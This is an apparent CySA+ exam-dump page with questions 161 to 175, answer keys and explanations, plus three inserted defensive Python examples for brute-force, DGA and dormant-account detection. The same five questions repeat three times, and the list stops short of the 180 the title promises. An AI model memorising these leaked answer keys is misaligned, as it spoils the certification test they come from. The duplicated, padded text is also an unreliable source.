CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 9 Q161-180
Question 161
A SOC analyst observes multiple failed login attempts targeting various administrative accounts from external IP addresses. The usernames follow predictable patterns, and attempts occur at a high frequency. Which of the following BEST describes the threat?
A) Brute-force attack targeting user credentials
B) Fileless malware using living-off-the-land techniques
C) Distributed denial-of-service (DDoS) attack
D) Phishing emails delivering malicious attachments
Answer A
Explanation:
A Brute-force attack targeting user credentials
The scenario describes a classic brute-force attack. Brute-force attacks involve systematically attempting combinations of usernames and passwords to gain unauthorized access to systems. The presence of multiple failed login attempts targeting administrative accounts, especially with predictable username patterns, strongly indicates the use of automated attack tools rather than isolated human error.
Attackers often deploy distributed botnets to launch brute-force campaigns from multiple IP addresses. This evasion technique circumvents basic IP-based blocking and allows rapid testing of thousands of credentials. Such attacks can target weak, default, or reused passwords, aiming to compromise privileged accounts to escalate access or deploy malware.
Detection requires a multi-layered approach. SIEM solutions that aggregate authentication logs can identify patterns of failed login attempts, high-frequency access from unusual geolocations, or repeated access attempts outside normal business hours. Behavioral analysis, anomaly detection, and correlation with threat intelligence feeds can further identify ongoing brute-force campaigns.
Mitigation strategies include account lockout policies, which temporarily disable accounts after a defined number of failed attempts, and multi-factor authentication (MFA), which requires an additional verification factor beyond the password. Rate-limiting on authentication endpoints can slow attacks, providing time for detection and intervention.
Additional preventative measures include enforcing strong password policies, frequent password rotation, and user training on secure credential practices. Threat intelligence integration can help block IP addresses associated with known brute-force campaigns.
B Fileless malware using living-off-the-land techniques
Fileless malware operates primarily in memory and leverages legitimate tools like PowerShell or WMI. It does not manifest as repeated failed login attempts across multiple accounts.
C Distributed denial-of-service (DDoS) attack
DDoS attacks focus on overwhelming system resources to disrupt service availability rather than attempting credential compromise.
D Phishing emails delivering malicious attachments
Phishing attacks rely on user interaction to deliver malware or steal credentials. Automated login attempts across multiple accounts do not align with typical phishing activity.
Question 162
An analyst detects abnormal outbound traffic from a host to multiple unknown external IP addresses over high-numbered ports. DNS logs indicate frequent queries to pseudo-randomly generated domains. Which of the following BEST describes this activity?
A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Routine software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system
Answer A
Explanation:
A Malware using a domain generation algorithm (DGA) for command-and-control
The combination of high-volume DNS queries to pseudo-random domains and outbound connections to unknown external IPs over non-standard ports is indicative of malware leveraging a domain generation algorithm (DGA) to maintain resilient command-and-control (C2) communication. DGAs dynamically generate domains that allow malware to maintain contact with C2 servers even if some domains are blocked or taken down.
DGAs are commonly used by sophisticated malware families and advanced persistent threat (APT) actors. They enable persistent, stealthy communication with compromised hosts while evading static blacklist-based security controls. Indicators of DGA activity include high-entropy domain names, frequent DNS queries, repeated failed resolutions, and connections to non-standard ports.
Detection and mitigation require a combination of network and endpoint monitoring. SIEM correlation, behavioral analysis, and machine learning algorithms can identify unusual DNS and network patterns indicative of DGA activity. Reverse-engineering the malware's DGA allows prediction of the domains it will generate next, enabling proactive domain blocking or sinkholing.
Mitigation strategies include isolating affected endpoints, blocking known malicious domains and IPs, performing malware eradication, and conducting forensic investigations. Threat intelligence integration helps identify IOCs, associated malware families, and attack techniques. Network segmentation, strict egress filtering, application whitelisting, and user education enhance defenses against DGA-based malware.
B Routine software update traffic
Software updates connect to known servers on standard ports. Randomized domains and high-frequency queries are inconsistent with legitimate update behavior.
C Distributed denial-of-service (DDoS) attack
DDoS attacks aim to overwhelm resources to degrade availability rather than establishing covert communication with C2 servers.
D Misconfigured internal monitoring system
While misconfigurations may generate abnormal traffic, they rarely result in high-frequency queries to pseudo-random domains combined with outbound connections to unknown IP addresses.
Question 163
A security audit identifies multiple privileged service accounts that have not been used in over six months but retain administrative privileges. Which control would MOST effectively reduce associated risks?
A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints
Answer A
Explanation:
A Implement automated account deprovisioning
Inactive privileged accounts are high-risk because attackers may exploit them to gain unauthorized access, maintain persistence, or perform lateral movement. Automated account deprovisioning ensures that accounts are disabled or removed after a defined period of inactivity, reducing the attack surface and enforcing least privilege.
Integration with identity governance and privileged access management (PAM) systems ensures consistent policy enforcement, auditing, and regulatory compliance with standards such as PCI DSS, HIPAA, and SOX. Manual deprovisioning is prone to human error, potentially leaving dormant accounts vulnerable. Automated processes provide uniform enforcement and improve security posture.
Additional measures include multi-factor authentication (MFA), role-based access control (RBAC), periodic privilege recertification, and continuous monitoring. Attempts to access deprovisioned accounts can indicate insider threats or credential compromise. Automated deprovisioning reduces operational risk and strengthens security controls by eliminating dormant privileged accounts from the environment.
B Increase password complexity requirements for service accounts
Complex passwords help prevent brute-force attacks but do not reduce the inherent risk of unused privileged accounts.
C Disable all external SSH access
SSH restrictions reduce external attack vectors but do not address dormant account risks.
D Deploy full disk encryption on endpoints
Encryption protects data at rest but does not mitigate risks associated with dormant accounts.
Question 164
During a penetration test, testers exploit unsanitized web input fields, allowing OS-level command execution. Which control BEST mitigates this type of vulnerability?
A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter
Answer A
Explanation:
A Server-side input validation with parameterized commands
Command injection occurs when an application fails to validate user input, allowing execution of arbitrary OS commands. Server-side input validation ensures input conforms to expected patterns, types, and lengths. Parameterized commands or prepared statements separate user input from executable code, effectively preventing injection attacks.
Secure coding practices, input validation, output encoding, and adherence to secure frameworks reduce application-layer vulnerabilities. Static application security testing (SAST) and dynamic application security testing (DAST) help identify vulnerabilities during development. Web application firewalls (WAFs) provide an additional layer by blocking requests matching known attack signatures.
Monitoring anomalous input and logging validation failures enable early detection. Remediation includes code updates, secure coding training, and regular penetration testing. TLS encryption secures communication but does not prevent injection. Session timeouts mitigate session hijacking but not input validation vulnerabilities. Firewalls cannot effectively inspect application-layer input, making server-side input validation with parameterized commands the primary mitigation control.
B Enforce TLS encryption for all web traffic
TLS ensures confidentiality and integrity of data in transit but does not address command injection vulnerabilities.
C Increase session timeout values
Session timeouts reduce the risk of session hijacking but do not prevent command injection attacks.
D Add additional firewall rules at the perimeter
Firewalls provide network-level filtering but cannot prevent application-layer vulnerabilities.
Question 165
A SOC analyst observes obfuscated PowerShell scripts executing on endpoints and communicating with unknown external IPs. Antivirus scans detect no malicious files. Which threat BEST describes this activity?
A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack
Answer A
Explanation:
A Fileless malware leveraging living-off-the-land techniques
Fileless malware operates primarily in memory, using legitimate tools such as PowerShell, WMI, or Office macros to execute malicious actions. Obfuscated scripts communicating externally without leaving artifacts on disk indicate living-off-the-land malware, designed to bypass signature-based antivirus solutions.
Detection requires behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Indicators include abnormal script execution, outbound connections to unknown IPs, and deviations from normal system behavior. Mitigation involves isolating endpoints, terminating malicious processes, analyzing scripts, and remediating systems.
Preventive measures include least privilege enforcement, application whitelisting, PowerShell logging, script block logging, execution policy enforcement, and threat intelligence integration. Defense-in-depth strategies combining monitoring, anomaly detection, user training, and structured incident response are critical for mitigating fileless malware.
Unlike ransomware, phishing, or DDoS attacks, fileless malware operates without traditional files, leveraging memory-resident execution and legitimate system tools to persist, evade detection, and maintain control over affected systems.
Question 166
A SOC analyst detects numerous failed login attempts targeting multiple privileged accounts from external IP addresses. The usernames follow predictable patterns, and login attempts are occurring at a very high frequency. Which of the following BEST describes the threat?
A) Brute-force attack targeting user credentials
B) Fileless malware using living-off-the-land techniques
C) Distributed denial-of-service (DDoS) attack
D) Phishing emails delivering malicious attachments
Answer A
Explanation:
A Brute-force attack targeting user credentials
The described scenario is a classic brute-force attack. Brute-force attacks are methods where an attacker systematically tries combinations of usernames and passwords to gain unauthorized access to systems or applications. Multiple failed login attempts targeting privileged accounts, especially with predictable username patterns, strongly suggest the use of automated tools, such as scripts or botnets, rather than isolated human errors.
Attackers often use distributed botnets, sending login attempts from multiple IP addresses simultaneously to evade detection and avoid simple IP-based blocking. These attacks aim to compromise weak passwords, default credentials, or reused passwords across multiple systems. Once credentials are obtained, attackers may escalate privileges, move laterally across networks, deploy malware, or exfiltrate sensitive data.
Detection requires a layered approach. SIEM solutions can aggregate logs from authentication systems to detect patterns of failed login attempts, unusual access attempts from atypical geolocations, or anomalous login times. Advanced analytics, including machine learning and behavioral modeling, help identify patterns indicative of brute-force campaigns.
Mitigation includes account lockout policies, which temporarily disable accounts after a certain threshold of failed attempts, and multi-factor authentication (MFA), which requires additional verification beyond passwords, greatly reducing the risk of compromise. Rate-limiting login attempts at the application or network layer slows attacks, giving analysts more time to respond.
Additional preventive measures include enforcing strong password policies, regular password rotation, user awareness training on secure credential practices, and integration with threat intelligence feeds to proactively block known malicious IPs and identify ongoing brute-force campaigns.
B Fileless malware using living-off-the-land techniques
Fileless malware operates in memory, leveraging legitimate tools such as PowerShell or WMI. It does not manifest as repeated failed login attempts across multiple accounts.
C Distributed denial-of-service (DDoS) attack
DDoS attacks focus on overwhelming network or application resources to disrupt availability rather than attempting credential compromise.
D Phishing emails delivering malicious attachments
Phishing attacks require user interaction to deliver malware or steal credentials. Automated login attempts targeting multiple accounts are inconsistent with typical phishing campaigns.
Question 167
An analyst detects abnormal outbound traffic from a host to multiple unknown external IP addresses over non-standard ports. DNS logs reveal frequent queries to pseudo-randomly generated domains. Which of the following BEST describes this activity?
A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Routine software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system
Answer A
Explanation:
A Malware using a domain generation algorithm (DGA) for command-and-control
The combination of outbound connections over non-standard ports and high-frequency DNS queries to pseudo-random domains is indicative of malware employing a domain generation algorithm (DGA) for command-and-control (C2) communications. DGAs dynamically create domain names to allow malware to maintain contact with C2 servers even if previous domains are blocked or taken down.
DGAs are a hallmark of sophisticated malware campaigns and advanced persistent threat (APT) activity. They provide resilience and stealth, allowing malware to persist and communicate covertly with remote servers. Key indicators include high-entropy domain names, frequent DNS queries, repeated failed domain resolutions, and outbound connections over unusual ports.
Detection and mitigation require correlation of network and DNS logs, endpoint telemetry, and behavioral analysis. Machine learning can identify unusual patterns, such as high entropy in domain names or anomalous query frequency. Reverse-engineering the DGA can predict future domains, allowing preemptive blocking.
Mitigation strategies include isolating affected endpoints, blocking malicious domains and IP addresses, eradicating malware, and conducting thorough forensic investigations. Integration with threat intelligence feeds enables identification of malware families, associated indicators of compromise (IOCs), and attack techniques. Defense-in-depth measures—such as network segmentation, egress filtering, application whitelisting, and user training—enhance resilience against DGA-enabled malware.
B Routine software update traffic
Software updates typically connect to known servers on standard ports. Randomized domains and high-frequency queries are inconsistent with normal update behavior.
C Distributed denial-of-service (DDoS) attack
DDoS attacks overwhelm network resources but do not establish covert communication channels with pseudo-randomly generated domains.
D Misconfigured internal monitoring system
Misconfigurations may create abnormal traffic patterns, but they rarely generate high-frequency queries to pseudo-random domains or outbound connections to unknown IP addresses.
Question 168
A security audit identifies several privileged service accounts that have not been used for more than six months but retain administrative privileges. Which control would MOST effectively reduce associated risks?
A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints
Answer A
Explanation:
A Implement automated account deprovisioning
Inactive privileged accounts present a significant security risk because attackers may exploit them for unauthorized access, persistence, or lateral movement. Automated account deprovisioning systematically disables or removes accounts after a defined period of inactivity, reducing the attack surface and enforcing the principle of least privilege.
Integration with identity governance and privileged access management (PAM) systems ensures consistent policy enforcement, auditing, and compliance with regulatory frameworks, such as PCI DSS, HIPAA, and SOX. Manual deprovisioning is prone to human error, potentially leaving dormant accounts exposed, while automation provides consistent and timely removal.
Complementary controls include multi-factor authentication (MFA), role-based access control (RBAC), periodic privilege recertification, and continuous monitoring. Logging attempts to access deprovisioned accounts can help detect insider threats or unauthorized access attempts. Automated deprovisioning reduces operational risk and strengthens security posture by eliminating dormant privileged accounts.
B Increase password complexity requirements for service accounts
Complex passwords help prevent brute-force attacks but do not mitigate the risks associated with inactive privileged accounts.
C Disable all external SSH access
SSH restrictions reduce exposure to remote attacks but do not address the inherent risk of dormant accounts.
D Deploy full disk encryption on endpoints
Full disk encryption protects data at rest but does not prevent threats associated with dormant administrative accounts.
Question 169
During a penetration test, testers exploit unsanitized web input fields that allow operating system-level command execution. Which control BEST mitigates this type of vulnerability?
A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter
Answer A
Explanation:
A Server-side input validation with parameterized commands
Command injection occurs when applications fail to validate user input, allowing arbitrary OS-level commands to execute. Server-side validation ensures input adheres to expected types, lengths, and patterns, while parameterized commands or prepared statements separate user input from executable code.
Secure coding practices, including input validation, output encoding, and adherence to security frameworks, reduce application-layer vulnerabilities. Static application security testing (SAST) and dynamic application security testing (DAST) can identify potential issues during development. Web application firewalls (WAFs) provide an additional layer by filtering known malicious requests.
Monitoring anomalous input attempts and logging validation failures allows early detection of attack attempts. Remediation includes code updates, secure coding training for developers, and periodic penetration testing. TLS encryption secures data in transit but does not prevent command injection. Session timeouts mitigate session hijacking but not input vulnerabilities. Firewalls cannot inspect application-level input effectively, making server-side input validation with parameterized commands the primary mitigation control.
B Enforce TLS encryption for all web traffic
TLS ensures secure transmission but does not prevent command injection vulnerabilities.
C Increase session timeout values
Session timeout policies reduce the risk of hijacking but do not address command injection.
D Add additional firewall rules at the perimeter
Firewalls operate at the network layer and cannot prevent application-layer input vulnerabilities.
Question 170
A SOC analyst observes obfuscated PowerShell scripts executing on endpoints and communicating with unknown external IPs. Antivirus scans detect no malicious files. Which threat BEST describes this activity?
A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack
Answer A
Explanation:
A Fileless malware leveraging living-off-the-land techniques
Fileless malware operates primarily in memory and leverages legitimate tools such as PowerShell, WMI, or Office macros to perform malicious actions. Obfuscated scripts communicating with external IPs without leaving files on disk are indicative of living-off-the-land malware, designed to evade signature-based antivirus detection.
Detection requires behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Indicators include unusual script execution, outbound connections to unknown IPs, and deviations from baseline behavior. Mitigation includes isolating endpoints, terminating malicious processes, analyzing scripts, and remediating systems.
Preventive measures include enforcing least privilege, application whitelisting, PowerShell script logging, script block logging, execution policy enforcement, and integrating threat intelligence to block malicious domains. A defense-in-depth strategy combining monitoring, anomaly detection, user training, and structured incident response is critical for mitigating fileless malware.
Unlike ransomware, phishing, or DDoS attacks, fileless malware operates without creating traditional files, leveraging memory-resident execution and legitimate system tools for persistence, evasion, and control of compromised systems.
Question 171
A SOC analyst observes a spike in failed login attempts targeting several administrative accounts from multiple external IP addresses. The usernames follow predictable patterns, and the frequency of attempts is high. Which of the following BEST describes the threat?
A) Brute-force attack targeting user credentials
B) Fileless malware using living-off-the-land techniques
C) Distributed denial-of-service (DDoS) attack
D) Phishing emails delivering malicious attachments
Answer A
Explanation:
A Brute-force attack targeting user credentials
This scenario is indicative of a brute-force attack. Brute-force attacks involve systematically trying combinations of usernames and passwords to gain unauthorized access to systems or accounts. The repeated failed login attempts, especially targeting administrative accounts with predictable usernames, strongly suggest the use of automated attack tools such as scripts, bots, or distributed botnets, rather than isolated human errors.
Attackers often distribute brute-force attempts across multiple IP addresses to avoid detection and IP-based blocking. Such attacks target weak, default, or reused passwords and are particularly effective against high-privilege accounts because compromising them allows attackers to escalate privileges, move laterally within networks, deploy malware, or exfiltrate sensitive information.
Detection requires a multi-layered approach. Security information and event management (SIEM) solutions can aggregate authentication logs to identify patterns of failed login attempts, unusual access from atypical geolocations, and attempts outside normal business hours. Machine learning and behavioral analytics can identify anomalies indicative of brute-force campaigns.
Mitigation strategies include account lockout policies that temporarily disable accounts after a specified number of failed attempts, multi-factor authentication (MFA) requiring additional verification beyond passwords, and rate-limiting login attempts to slow attacks. Complementary measures include enforcing strong password policies, rotating passwords regularly, educating users about credential hygiene, and integrating threat intelligence to block IP addresses associated with known brute-force campaigns.
B Fileless malware using living-off-the-land techniques
Fileless malware operates in memory using legitimate tools such as PowerShell or WMI and does not manifest as repeated failed login attempts across multiple accounts.
C Distributed denial-of-service (DDoS) attack
DDoS attacks overwhelm network resources to disrupt availability rather than attempting credential compromise.
D Phishing emails delivering malicious attachments
Phishing campaigns rely on user interaction to deliver malware or steal credentials, and automated login attempts across multiple accounts are inconsistent with phishing attacks.
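The detection logic described in the explanations for Questions 161, 166 and 171 (failed logins against predictably named administrative accounts, at high frequency, from several external sources) can be expressed as a short SIEM-style correlation rule. The code below is an added illustration, not part of the exam material; the sshd-style log lines, the 60-second window and the thresholds are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sshd-style authentication log (not from any real system).
SAMPLE_LOG = """\
2024-03-04T09:00:01Z sshd[2201]: Failed password for admin from 203.0.113.5 port 51522 ssh2
2024-03-04T09:00:02Z sshd[2202]: Failed password for admin1 from 203.0.113.5 port 51523 ssh2
2024-03-04T09:00:02Z sshd[2203]: Failed password for admin2 from 198.51.100.7 port 40211 ssh2
2024-03-04T09:00:03Z sshd[2204]: Failed password for invalid user admin3 from 198.51.100.7 port 40212 ssh2
2024-03-04T09:00:03Z sshd[2205]: Failed password for administrator from 203.0.113.5 port 51524 ssh2
2024-03-04T09:00:04Z sshd[2206]: Failed password for admin4 from 203.0.113.9 port 33001 ssh2
2024-03-04T09:00:04Z sshd[2207]: Failed password for admin5 from 203.0.113.9 port 33002 ssh2
2024-03-04T09:00:05Z sshd[2208]: Failed password for root from 198.51.100.7 port 40213 ssh2
2024-03-04T09:30:00Z sshd[2300]: Failed password for jsmith from 10.0.0.12 port 50000 ssh2
2024-03-04T09:45:00Z sshd[2301]: Accepted password for jsmith from 10.0.0.12 port 50001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: Failed password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)
# "Predictable" administrative usernames: admin, admin<N>, administrator, root.
PRIVILEGED_RE = re.compile(r"^(admin\d*|administrator|root)$")


def parse_failures(text):
    """Return (timestamp, username, source_ip) for every failed login line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
            events.append((ts, m["user"], m["ip"]))
    return events


def is_external(ip):
    # Simplified: treats only 10/8 as internal; extend for 172.16/12, 192.168/16.
    return not ip.startswith("10.")


def detect_bruteforce(events, window=timedelta(seconds=60),
                      min_failures=5, min_sources=2):
    """Flag the busiest sliding window in which at least min_failures failed
    logins against privileged accounts arrive from at least min_sources
    external IPs. Returns a summary dict, or None if nothing crosses threshold."""
    events = sorted(e for e in events
                    if PRIVILEGED_RE.match(e[1]) and is_external(e[2]))
    best = None
    start = 0
    for end in range(len(events)):
        # Slide the window start forward until the window fits.
        while events[end][0] - events[start][0] > window:
            start += 1
        in_window = events[start:end + 1]
        sources = {ip for _, _, ip in in_window}
        accounts = {user for _, user, _ in in_window}
        if len(in_window) >= min_failures and len(sources) >= min_sources:
            cand = {
                "failures": len(in_window),
                "sources": sorted(sources),
                "accounts": sorted(accounts),
                "window_start": events[start][0].isoformat(),
            }
            if best is None or cand["failures"] > best["failures"]:
                best = cand
    return best


if __name__ == "__main__":
    print(detect_bruteforce(parse_failures(SAMPLE_LOG)))
```

The single internal failure for jsmith is not flagged, which is the point of combining an account pattern, a source count and a time window rather than alerting on every failed login.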
Question 172
An analyst observes abnormal outbound traffic from a host to multiple unknown external IP addresses over non-standard ports. DNS logs indicate frequent queries to pseudo-randomly generated domains. Which of the following BEST describes this activity?
A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Routine software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system
Answer A
Explanation:
A Malware using a domain generation algorithm (DGA) for command-and-control
The combination of outbound connections over non-standard ports and high-frequency DNS queries to pseudo-random domains strongly suggests malware leveraging a domain generation algorithm (DGA) to maintain command-and-control (C2) communications. DGAs dynamically generate domains to allow malware to communicate with C2 servers even if previous domains are blocked or taken down.
DGAs are frequently used by advanced persistent threat (APT) actors and sophisticated malware families. They provide resilience, stealth, and persistence, making it difficult for defenders to disrupt malware operations. Key indicators include high-entropy domains, frequent DNS queries, repeated failed resolutions, and outbound connections to unusual ports.
Detection requires correlating network and DNS logs, monitoring endpoints, and behavioral analysis. Machine learning and anomaly detection can highlight unusual query frequency and entropy. Reverse-engineering the DGA allows prediction of future domains, enabling proactive blocking.
Mitigation strategies include isolating infected hosts, blocking known malicious domains and IPs, eradicating malware, and performing forensic investigations. Threat intelligence can provide insight into associated malware families and techniques. Defense-in-depth measures such as network segmentation, egress filtering, application whitelisting, and user education are critical in countering DGA-based malware.
B Routine software update traffic
Legitimate updates connect to known servers using standard ports, and random domains or frequent high-entropy DNS queries are inconsistent with legitimate behavior.
C Distributed denial-of-service (DDoS) attack
DDoS attacks focus on overwhelming systems to degrade availability, not establishing covert C2 communication channels.
D Misconfigured internal monitoring system
While misconfigurations can produce abnormal traffic, they rarely generate high-frequency queries to pseudo-random domains combined with outbound connections to unknown IP addresses.
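The DGA indicators named in the explanations for Questions 162, 167 and 172 (high-entropy domain names, high query frequency and repeated failed resolutions) can be scored per client from a resolver log. This is an added example rather than exam content; the log format, the entropy threshold of 3.5 bits and the NXDOMAIN ratio are constructed assumptions, and the second-level-label extraction is deliberately naive.

```python
import math
from collections import defaultdict

# Constructed resolver log: "client qname rcode" (not real data).
DNS_LOG = """\
10.0.0.25 xk3qz9tq7vbm2p.com NXDOMAIN
10.0.0.25 p0w8ydl4rsnb6c.net NXDOMAIN
10.0.0.25 m7vtq2bzx9kq1w.org NXDOMAIN
10.0.0.25 zq4lpx8wnb3vrc.com NXDOMAIN
10.0.0.25 c9rkw2mxq7zpvb.info NXDOMAIN
10.0.0.25 jq8wvbmz3xr2tk.com NOERROR
10.0.0.25 update.example.com NOERROR
10.0.0.40 www.example.com NOERROR
10.0.0.40 mail.example.org NOERROR
10.0.0.40 cdn.example.net NOERROR
"""


def shannon_entropy(s):
    """Bits of entropy per character; pseudo-random labels score near log2(len)."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registrable_label(domain):
    # Naive: second-to-last label. Does not handle multi-part public
    # suffixes such as co.uk; use a public-suffix list in production.
    parts = domain.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def parse_dns(text):
    return [tuple(line.split()) for line in text.splitlines() if line.strip()]


def score_clients(records, entropy_threshold=3.5, min_label_len=10,
                  min_suspect=5, min_nx_ratio=0.5):
    """Flag clients with many high-entropy lookups AND a high NXDOMAIN ratio.
    Requiring both reduces false positives from CDNs with random-looking names
    (high entropy, but they resolve) and from typos (NXDOMAIN, but low entropy)."""
    stats = defaultdict(lambda: {"total": 0, "nx": 0, "high_entropy": 0, "suspects": []})
    for client, qname, rcode in records:
        s = stats[client]
        s["total"] += 1
        label = registrable_label(qname)
        if rcode == "NXDOMAIN":
            s["nx"] += 1
        if len(label) >= min_label_len and shannon_entropy(label) >= entropy_threshold:
            s["high_entropy"] += 1
            s["suspects"].append(qname)
    flagged = {}
    for client, s in stats.items():
        nx_ratio = s["nx"] / s["total"]
        if s["high_entropy"] >= min_suspect and nx_ratio >= min_nx_ratio:
            flagged[client] = {
                "nx_ratio": round(nx_ratio, 2),
                "high_entropy": s["high_entropy"],
                "sample": s["suspects"][:3],
            }
    return flagged


if __name__ == "__main__":
    print(score_clients(parse_dns(DNS_LOG)))
```

A flagged client is a lead for endpoint triage and egress review, not proof of infection on its own.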
Question 173
A security audit identifies several privileged service accounts that have not been used for more than six months but still retain administrative privileges. Which control would MOST effectively mitigate this risk?
A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints
Answer A
Explanation:
A Implement automated account deprovisioning
Inactive privileged accounts are high-risk because attackers may exploit them to gain unauthorized access, establish persistence, or perform lateral movement. Automated account deprovisioning ensures that accounts are disabled or removed after a defined period of inactivity, reducing the attack surface and enforcing the principle of least privilege.
Integration with identity governance and privileged access management (PAM) systems ensures consistent policy enforcement, auditing, and regulatory compliance with standards such as PCI DSS, HIPAA, and SOX. Manual deprovisioning is prone to human error, leaving dormant accounts vulnerable, whereas automation ensures timely and consistent removal of unused accounts.
Additional measures include multi-factor authentication (MFA), role-based access control (RBAC), periodic privilege recertification, and continuous monitoring of account activity. Logging attempts to access deprovisioned accounts can help detect insider threats or unauthorized access attempts. Automated deprovisioning reduces operational risk and strengthens security posture by eliminating dormant privileged accounts from the environment.
B Increase password complexity requirements for service accounts
While complex passwords help reduce the risk of brute-force attacks, they do not mitigate the threat posed by dormant privileged accounts.
C Disable all external SSH access
Restricting external SSH connections reduces the attack surface for remote attacks but does not address risks associated with unused privileged accounts.
D Deploy full disk encryption on endpoints
Encryption protects data at rest but does not mitigate threats associated with dormant administrative accounts.
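The deprovisioning rule from Questions 163, 168 and 173 (disable privileged accounts idle for more than six months) is easy to state but has edge cases a practitioner has to decide on: accounts that have never logged on, newly created accounts still inside a grace period, and documented break-glass accounts that must be recertified rather than auto-disabled. The following added example, not part of the exam material, evaluates a constructed account inventory against that policy; the 180-day threshold, the exemption list and the account names are assumptions.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional


@dataclass
class Account:
    name: str
    privileged: bool
    enabled: bool
    last_logon: Optional[datetime]   # None means the account has never logged on
    created: datetime


# Constructed inventory as an identity governance export might provide it.
NOW = datetime(2024, 6, 1)
INVENTORY = [
    Account("svc_backup", True, True, datetime(2023, 10, 1), datetime(2020, 1, 1)),      # idle 244 days
    Account("svc_etl", True, True, datetime(2024, 5, 20), datetime(2021, 3, 1)),         # active
    Account("svc_legacy", True, True, None, datetime(2023, 9, 1)),                        # never used
    Account("svc_new", True, True, None, datetime(2024, 5, 25)),                          # inside grace period
    Account("svc_report", False, True, datetime(2023, 1, 1), datetime(2019, 1, 1)),      # idle but unprivileged
    Account("breakglass_admin", True, True, datetime(2022, 1, 1), datetime(2019, 1, 1)), # exempt, recertify
]
EXEMPT = {"breakglass_admin"}


def dormant_privileged(accounts, now=NOW, max_idle=timedelta(days=180), exempt=EXEMPT):
    """Return (account, action, reason) tuples for enabled privileged accounts.
    Never-used accounts are measured from creation, so a brand-new account is
    not disabled before anyone has had a chance to use it."""
    actions = []
    for a in accounts:
        if not (a.privileged and a.enabled):
            continue
        if a.name in exempt:
            actions.append((a.name, "review", "exempt: requires documented recertification"))
            continue
        reference = a.last_logon or a.created
        idle = now - reference
        if idle > max_idle:
            reason = "never logged on" if a.last_logon is None else f"idle {idle.days} days"
            actions.append((a.name, "disable", reason))
    return actions


if __name__ == "__main__":
    for name, action, reason in dormant_privileged(INVENTORY):
        print(f"{action:8} {name:18} {reason}")
```

Feeding the "disable" rows to the directory's disable API and the "review" rows to the recertification workflow is what turns this check into the automated control the question asks for.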
Question 174
During a penetration test, testers exploit unsanitized web input fields, allowing operating system-level command execution. Which control BEST mitigates this vulnerability?
A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter
Answer A
Explanation:
A Server-side input validation with parameterized commands
Command injection occurs when applications fail to properly validate user input, allowing arbitrary OS-level command execution. Server-side input validation ensures that all input matches expected patterns, types, and lengths, while parameterized commands or prepared statements separate user input from executable code, preventing injection attacks.
Secure coding practices, input validation, output encoding, and adherence to secure frameworks reduce application-layer vulnerabilities. Static application security testing (SAST) and dynamic application security testing (DAST) help identify vulnerabilities during development. Web application firewalls (WAFs) can filter known malicious request patterns as an additional protection layer.
Monitoring anomalous input attempts and logging validation failures allow early detection of potential attacks. Remediation includes code updates, developer secure coding training, and regular penetration testing. TLS encryption secures data in transit but does not prevent injection. Session timeout policies reduce session hijacking risk but do not address input vulnerabilities. Firewalls cannot inspect application-layer input effectively, making server-side validation with parameterized commands the most effective mitigation.
B Enforce TLS encryption for all web traffic
TLS ensures confidentiality and integrity of data in transit but does not prevent command injection attacks.
C Increase session timeout values
Session timeouts reduce session hijacking risk but do not address command injection.
D Add additional firewall rules at the perimeter
Network-level firewalls cannot prevent application-layer input vulnerabilities.
Question 175
A SOC analyst observes obfuscated PowerShell scripts executing on endpoints and communicating with unknown external IP addresses. Antivirus scans detect no malicious files. Which threat BEST describes this activity?
A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack
Answer A
Explanation:
A Fileless malware leveraging living-off-the-land techniques
Fileless malware primarily resides in memory and leverages legitimate system tools such as PowerShell, WMI, or Office macros to perform malicious actions. Obfuscated scripts communicating with external IPs without leaving artifacts on disk are indicative of living-off-the-land malware, designed to evade signature-based antivirus detection.
Detection requires behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Indicators include unusual script execution, outbound connections to unknown IPs, and deviations from baseline behavior. Mitigation includes isolating affected endpoints, terminating malicious processes, analyzing scripts, and remediating systems.
Preventive controls include least privilege enforcement, application whitelisting, PowerShell logging, script block logging, execution policy enforcement, and integration with threat intelligence feeds to block malicious domains. Defense-in-depth strategies combining monitoring, anomaly detection, user training, and structured incident response are critical to mitigating fileless malware.
Unlike ransomware, phishing, or DDoS attacks, fileless malware operates without creating traditional files, using memory-resident execution and legitimate tools to persist, evade detection, and maintain control over compromised systems.
